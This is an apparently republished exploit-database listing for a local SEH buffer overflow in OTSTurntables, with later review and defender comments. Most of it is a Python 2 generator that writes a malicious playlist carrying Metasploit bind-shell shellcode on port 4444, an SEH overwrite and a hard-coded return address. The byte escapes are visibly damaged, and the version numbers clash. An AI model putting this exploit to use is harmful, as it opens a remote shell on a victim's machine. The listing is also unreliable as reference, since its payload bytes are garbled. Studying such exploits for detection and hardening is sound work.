[local exploits] - OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)
Posted on 28 November 2010
# ========================================================
# OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)
# ========================================================
#
# Proof-of-concept generator (Python 2 syntax) published for a local buffer
# overflow in the playlist import of OTSTurntables. It writes a malformed
# playlist file (exploit.m3u or exploit.ofl) to the current directory; the
# overflow happens only when that file is imported into the player.
#
# NOTE(review): the title line below and the final print say 1.00.028, while
# the Version field and the page title say 1.00.048; the page does not say
# which is correct.
# NOTE(review): the byte escapes in the string literals appear to have been
# damaged when this page was extracted. The literals are kept exactly as
# published; as shown they do not reproduce the original bytes.
#
# Defender notes, limited to what the listing itself states:
# - The payload comment describes a Metasploit-generated bind payload on
#   TCP port 4444. A listener on that port owned by the player process is a
#   detection signal.
# - The file is far larger than a normal playlist entry (see `stuff`), so
#   oversized or single-line .m3u/.ofl files are worth flagging.
# - The technique overwrites a structured-exception-handler record and relies
#   on a hard-coded address in msacm32.drv. Hardening aimed at that class
#   (SafeSEH, SEHOP, DEP, ASLR) is the relevant mitigation. The author lists
#   only Windows XP SP3 EN as tested.

# Exploit Title: OTSTurntables 1.00.028 (m3u/ofl) Local BOF Exploit (SEH)
# Date: 11/24/2010
# Author: 0v3r
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.048
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

import sys

# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
# Per the comment above, this is the encoded payload; its declared size (696)
# is what the `junk` padding below is computed against.
shellcode = ("xebx03x59xebx05xe8xf8xffxffxffx49x48x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax4a"
"x58x50x30x42x30x42x6bx42x41x5ax32x42x42x42x32x41"
"x42x41x30x41x41x58x50x38x42x42x75x4bx59x4bx4cx30"
"x6ax58x6bx52x6dx6dx38x38x79x39x6fx4bx4fx39x6fx75"
"x30x6ex6bx32x4cx71x34x34x64x6ex6bx31x55x37x4cx6e"
"x6bx33x4cx55x55x53x48x57x71x68x6fx6cx4bx50x4fx47"
"x68x6ex6bx53x6fx47x50x56x61x7ax4bx72x69x6ex6bx36"
"x54x4ex6bx63x31x38x6ex37x41x6bx70x4fx69x6cx6cx4b"
"x34x4bx70x52x54x64x47x6fx31x4bx7ax34x4dx46x61x59"
"x52x48x6bx5ax54x65x6bx73x64x41x34x77x58x74x35x6b"
"x55x4ex6bx61x4fx57x54x75x51x58x6bx70x66x6cx4bx36"
"x6cx42x6bx6ex6bx31x4fx67x6cx46x61x7ax4bx63x33x66"
"x4cx6cx4bx6cx49x50x6cx66x44x47x6cx53x51x6fx33x64"
"x71x4bx6bx41x74x4ex6bx63x73x56x50x6cx4bx63x70x76"
"x6cx6cx4bx52x50x67x6cx6cx6dx4cx4bx57x30x43x38x33"
"x6ex53x58x4cx4ex30x4ex76x6ex7ax4cx32x70x4bx4fx78"
"x56x62x46x66x33x61x76x75x38x66x53x36x52x75x38x71"
"x67x32x53x45x62x63x6fx56x34x6bx4fx6ex30x70x68x58"
"x4bx48x6dx4bx4cx35x6bx46x30x6bx4fx38x56x53x6fx4f"
"x79x6bx55x50x66x6ex61x48x6dx76x68x37x72x73x65x41"
"x7ax45x52x79x6fx38x50x30x68x4bx69x34x49x49x65x6e"
"x4dx66x37x6bx4fx7ax76x50x53x46x33x36x33x42x73x46"
"x33x57x33x50x53x41x53x32x73x6bx4fx4ex30x75x36x31"
"x78x77x61x73x6cx52x46x43x63x6dx59x58x61x4cx55x52"
"x48x4fx54x54x5ax50x70x4fx37x61x47x4bx4fx4ex36x30"
"x6ax76x70x73x61x71x45x39x6fx6ex30x30x68x69x34x6c"
"x6dx76x4ex49x79x66x37x79x6fx6bx66x63x63x42x75x59"
"x6fx7ax70x41x78x4dx35x57x39x6cx46x57x39x42x77x59"
"x6fx68x56x52x70x31x44x51x44x46x35x4bx4fx78x50x4e"
"x73x50x68x58x67x44x39x48x46x30x79x41x47x6bx4fx59"
"x46x51x45x6bx4fx6ex30x75x36x50x6ax70x64x32x46x62"
"x48x52x43x50x6dx6dx59x4dx35x63x5ax52x70x32x79x65"
"x79x38x4cx4fx79x69x77x30x6ax62x64x4bx39x6bx52x30"
"x31x4fx30x6ax53x6cx6ax39x6ex43x72x74x6dx59x6ex71"
"x52x74x6cx6fx63x4cx4dx50x7ax50x38x6cx6bx4ex4bx6c"
"x6bx33x58x33x42x59x6ex6fx43x45x46x39x6fx53x45x50"
"x44x79x6fx79x46x63x6bx50x57x71x42x71x41x70x51x50"
"x51x33x5ax74x41x42x71x32x71x76x35x30x51x69x6fx7a"
"x70x72x48x4ex4dx6ax79x53x35x6ax6ex30x53x79x6fx5a"
"x76x30x6ax6bx4fx39x6fx65x67x6bx4fx5ax70x6ex6bx72"
"x77x59x6cx6bx33x7ax64x70x64x49x6fx7ax76x76x32x6b"
"x4fx5ax70x30x68x6cx30x6fx7ax57x74x73x6fx73x63x6b"
"x4fx38x56x4bx4fx4ex30x4a")

# near jump 928 bytes encoded with Alpha2 encoder
# NOTE(review): this value is never used. `jump` is reassigned further down,
# before `buff` is built, so only the later assignment reaches the file.
jump = ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x37x49x49x49x51x5ax6ax65"
"x58x50x30x41x31x41x42x6bx41x41x75x41x32x41x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x38x69x49x79x55"
"x30x79x6cx4bx4fx4bx4fx65")

nopsled = "x90" * 16
# Padding sized so that padding plus payload reaches a fixed length of 912.
junk = "x90" * (912 - len(shellcode))
nseh = "xebx06x90x90" # short jump
# Hard-coded address inside a system module ("ppr" is presumably pop/pop/ret).
# It ties the listing to the tested OS build named in the header.
seh = "x3fx28xd1x72" # 0x72D1283F - ppr - msacm32.drv
jump = "xe9x60xfcxffxff" # near jump
# Large trailing filler; it makes the generated file far larger than a
# legitimate playlist entry.
stuff = "x44" * 10000

# Final file content. The concatenation order is significant, so it is kept
# exactly as published.
buff = junk + shellcode + nseh + seh + nopsled + jump + stuff

try:
    print " "
    print "---------------------------------------------------------------------------------"
    print "| OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH) |"
    print "---------------------------------------------------------------------------------"
    print " "
    # Exactly one argument is required: 1 selects .m3u output, 2 selects .ofl.
    if len(sys.argv)!=2:
        print "Usage: exploit.py <option> "
        print "File type options:"
        print "[1] m3u file"
        print "[2] ofl file"
        sys.exit(0)
    # int() raises ValueError on a non-numeric option; handled below.
    if int(sys.argv[1]) == 1:
        fname = "exploit.m3u"
    elif int(sys.argv[1]) == 2 :
        fname = "exploit.ofl"
    else:
        print "Check again the available options!"
        sys.exit(0)
    # The only side effect of the script: one file in the working directory.
    f = open(fname,'w')
    f.write(buff)
    f.close()
    print "- File ",fname," created..."
    print "- To run exploit open OTSTurntables 1.00.028 and import the file",fname
except SystemExit:
    # sys.exit(0) above raises SystemExit inside the try; swallow it quietly.
    pass
except ValueError:
    print "Check again the available options!"
except:
    # Bare except: any other error, not only a failed write, gets this message.
    print "-Oooops! Can't write file... "

# 1337db.com [2010-11-28]